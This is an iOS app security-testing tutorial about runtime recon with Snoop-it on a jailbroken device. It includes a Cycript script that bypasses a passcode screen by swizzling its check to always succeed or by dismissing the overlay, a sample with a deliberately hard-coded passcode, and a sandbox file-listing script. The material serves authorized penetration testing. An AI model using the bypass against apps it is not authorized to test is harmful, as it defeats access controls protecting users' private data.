iOS Application Security Part Two – Gathering Information Of an iOS App- aka. Recon

Welcome to my second article on “iOS Application Security Testing Series”. You can find Part 1 here.

Imagine a scenario where you, as an iOS application security tester, are tasked with auditing an application to identify vulnerabilities. By itself the task may not seem too daunting until you learn of a couple of constraints: you have very little information on how the application operates or what protocols it uses, and you have a limited amount of time to conduct your evaluation. What do you do? In these scenarios, searching for and identifying vulnerabilities in the application can be an epic task.

In this article, I’d like to walk you through how we can analyse any application installed on your (jailbroken) device and determine, at runtime and without its source code, things like the classes, the names of the view controllers it uses, the internal libraries, and even details like the variable and method names used in any class or view controller.

I generally start with Snoop-it by NESO Security Labs. Basically, I try to automate as much of this runtime analysis as possible.

A quick list of all the features provided by Snoop-it could be seen in the screenshot below.

Installation

To install Snoop-it on your device, go to Cydia, tap the Sources tab at the bottom, tap Edit, then Add, and add the repo http://repo.nesolabs.de; then install Snoop-it from that source. Once this is done, you will see the Snoop-it app icon on your device. Open it and you will see this user interface.

Before the first run, Snoop-it must be configured properly. For this, you need to select the app you want to analyze using the “Snoop-it Configuration App”. Within the ‘Applications’ tab, you can choose between available System/Cydia apps or apps installed from the official Apple App Store. For this blog, my demo will be the Wikipedia app, so I select it.

Next, configure Snoop-it’s settings. In this case, I have left the port number at 12345 and the authentication at the preselected default. Keep authentication enabled whenever the device is on a shared network: the web interface hands full control of the instrumented app to anyone who can reach that port.

Now open the Snoop-it web interface in any browser at the address shown in the Snoop-it application; in my case, the address is http://10.80.56.187:12345. Make sure the target app is open and in the foreground on your device, then refresh the Snoop-it web interface. As you can see, you get a clean interface that you can use to perform a full-fledged security assessment of the application.


Class Information

Now we are at a stage where we can analyse the app for class information. So, let’s look at the class information for the Wikipedia app. On the left-hand side, under Analysis, go to Objective-C Classes. On the right-hand side, you will see all the classes and information such as their properties and method names (screenshot below, with no method selected).

The ones in orange represent the classes that currently have live instances. If you hover your mouse over a view controller class, you will see that it has an instance which is presently live.

Similarly, you can see the methods and properties for Wikipedia app.

Technique to bypass authentication

A well-known technique for bypassing authentication, method swizzling in Objective-C (replacing a method’s implementation at runtime), is possible with Snoop-it. Just check any relevant method and click Setup and Invoke at the top right. Here is an old-school video on Method Swizzling in Objective-C 🙂

In addition, you can trace method and system calls on the fly if desired.

View Controllers

TOPasscodeViewController is an open-source UIViewController subclass that will overlay a full-screen passcode UI over an app’s content. The user must enter the correct password into it in order to proceed, or hit ‘Cancel’ to exit the private part of the app. GitHub here.

This sort of UI is useful for certain apps that contain highly sensitive information (such as banking or health) where users may indeed want an extra level of security beyond the standard iOS passcode.

Basic Implementation

#import "TOPasscodeViewController.h"

// The presenting view controller declares conformance to TOPasscodeViewControllerDelegate,
// e.g. @interface MyViewController () <TOPasscodeViewControllerDelegate> in its .m file.

- (void)showButtonTapped:(id)sender
{
    // Present a translucent dark, four-digit passcode screen over the current content.
    TOPasscodeViewController *passcodeViewController = [[TOPasscodeViewController alloc] initWithStyle:TOPasscodeViewStyleTranslucentDark passcodeType:TOPasscodeTypeFourDigits];
    passcodeViewController.delegate = self;
    [self presentViewController:passcodeViewController animated:YES completion:nil];
}

// Called when the user hits ‘Cancel’: leave the private part of the app.
- (void)didTapCancelInPasscodeViewController:(TOPasscodeViewController *)passcodeViewController
{
    [self dismissViewControllerAnimated:YES completion:nil];
}

// The library asks the delegate whether the entered code is correct. This sample
// compares against a hard-coded "1234", which is what makes it so easy to attack below.
- (BOOL)passcodeViewController:(TOPasscodeViewController *)passcodeViewController isCorrectCode:(NSString *)code
{
    return [code isEqualToString:@"1234"];
}

To defeat the check in passcodeViewController:isCorrectCode: we could use Cycript to replace the method’s implementation so that it always returns YES. But why go to all that hassle when you can just hide the view controller?

There is a feature in Snoop-it for exactly this: on the extreme left-hand side, under Analysis, click View Controller, select the view controller class on the right-hand side and click Display Controller. Then click Close or Hide View Controller, depending on whether the view controller is presented over another view controller or not.
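Both approaches as a Cycript script, added here as an illustration; it is not code from the original article or from the TOPasscodeViewController project. It assumes Cycript is installed on the jailbroken device, that the passcode screen is presented at the moment the script runs, that the delegate method is named as in the Basic Implementation above, and a Cycript build that exposes instance methods through `ClassName.prototype` (older builds used `ClassName.messages`). The delegate’s class is recovered from the live instance, so no class name has to be guessed:

```cycript
// Added example, run on the device against the foreground app:
//   cycript -p Wikipedia passcode_bypass.cy
// Assumptions: a TOPasscodeViewController is presented right now and its delegate
// implements passcodeViewController:isCorrectCode: as in the Basic Implementation.

// Approach 1: swizzle the delegate's check so every code is accepted.
function acceptAnyCode() {
    var live = choose(TOPasscodeViewController);   // live instances, the ones Snoop-it shows in orange
    if (live.length == 0) {
        return null;                               // passcode screen is not up, nothing to hook
    }
    var hostClass = [live[0].delegate class];      // whichever view controller implements the delegate
    var sel = 'passcodeViewController:isCorrectCode:';
    var original = hostClass.prototype[sel];       // keep a handle so the change can be undone
    hostClass.prototype[sel] = function(passcodeVC, code) {
        return true;                               // the original compared against a hard-coded "1234"
    };
    return function restore() { hostClass.prototype[sel] = original; };
}

// Approach 2: leave the check alone and just remove the overlay, which is what
// Snoop-it's Close/Hide View Controller button does for you.
function dismissPasscodeScreen() {
    var top = UIApp.keyWindow.rootViewController.presentedViewController;
    if (top == null || ![top isKindOfClass:TOPasscodeViewController]) {
        return false;                              // not the passcode screen, do not dismiss it
    }
    [top dismissViewControllerAnimated:true completion:null];
    return true;
}

var restore = acceptAnyCode();   // now anything typed into the passcode screen is accepted
// restore();                    // put the original implementation back when finished
// dismissPasscodeScreen();      // or simply hide the overlay instead
```

The swizzle is the more useful of the two during a test because it survives the screen being presented again, whereas hiding the overlay only helps once; restoring the original implementation afterwards keeps the app in a known state for the rest of the assessment.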

Internal Libraries and the File System Monitoring

Snoop-it can also monitor the files and directories the application accesses. To do that, on the navigation menu on the left side, click Filesystem under Monitoring. This feature is useful when an application is writing to a database file and you need to find out that filename. You can also download these files just by double-clicking them and then analyse them on your machine. Check what actually lands on disk: credentials, tokens or personal data sitting in plist, SQLite or cache files is a classic insecure-storage finding.
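As an added example of the same recon done from Cycript (it is not part of the original article): walk the app’s data container and list each regular file together with its Data Protection class, so that databases or caches written without protection stand out. It assumes Cycript on the device; the numeric values 9 (NSDocumentDirectory) and 1 (NSUserDomainMask) are used on the assumption that the enum names are not resolvable from the script.

```cycript
// Added example, run on the device against the foreground app:
//   cycript -p Wikipedia sandbox_files.cy
// Prints every regular file under the app's data container with its
// NSFileProtectionKey value. Sensitive data marked NSFileProtectionNone is
// readable even while the device is locked and deserves a closer look.

function listSandboxFiles() {
    var fm = [NSFileManager defaultManager];
    // 9 = NSDocumentDirectory, 1 = NSUserDomainMask (numeric on purpose, see lead-in)
    var documents = [[[fm URLsForDirectory:9 inDomains:1] lastObject] path];
    var container = [documents stringByDeletingLastPathComponent];   // Documents/ sits directly in the container
    var walker = [fm enumeratorAtPath:container];
    var results = [];
    var relative;
    while ((relative = [walker nextObject]) != null) {
        var full = [container stringByAppendingPathComponent:relative];
        var attrs = [fm attributesOfItemAtPath:full error:null];
        if (attrs == null) {
            continue;                                   // unreadable entry, skip it
        }
        var type = [attrs objectForKey:@"NSFileType"];
        if (![type isEqualToString:@"NSFileTypeRegular"]) {
            continue;                                   // directories and symlinks are not interesting here
        }
        var protection = [attrs objectForKey:@"NSFileProtectionKey"];
        var label = (protection == null) ? "(no protection attribute reported)" : String(protection);
        results.push(String(relative) + "  " + label);
    }
    return results;
}

listSandboxFiles().forEach(function(line) { system.print(line); });
```

Pair the listing with Snoop-it’s Filesystem monitor: the monitor tells you which file the app touched during a given action, and the listing tells you how that file is protected at rest.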

Double Proxy Network, Web, and API Monitoring

Burp Suite and OWASP ZAP are the proxies I always run in the background to intercept the app’s HTTP and SSL/TLS traffic. Two things need to be in place for that to work: the device must be configured to use the proxy, and the proxy’s CA certificate must be installed and trusted on the device. An app that pins its server certificate will still refuse the connection until the pinning is bypassed, so interception is never quite automatic.

Conclusion

In this article, we looked at how we can use Snoop-it to perform black-box recon of an app and how easy it makes the job. It’s an awesome tool, but there are many other ways to achieve the same ends. We could have used Introspy, which is undoubtedly one of the most powerful tools for analysing the security of iOS applications, or Clutch, class-dump-z, LLDB, Hopper, idb, Cycript and Frida, a dynamic instrumentation toolkit for developers and reverse engineers.

About Liban Mohamud

My name is Liban Mohamud. I hold an M.Sc. in Digital Investigations, Forensics and Computer Security from University College Dublin (UCD). I’m an Information Security Specialist and researcher with a passion for Mobile Security and Mobile Forensics, and I have over 15 years of experience in the industry. @coolx28
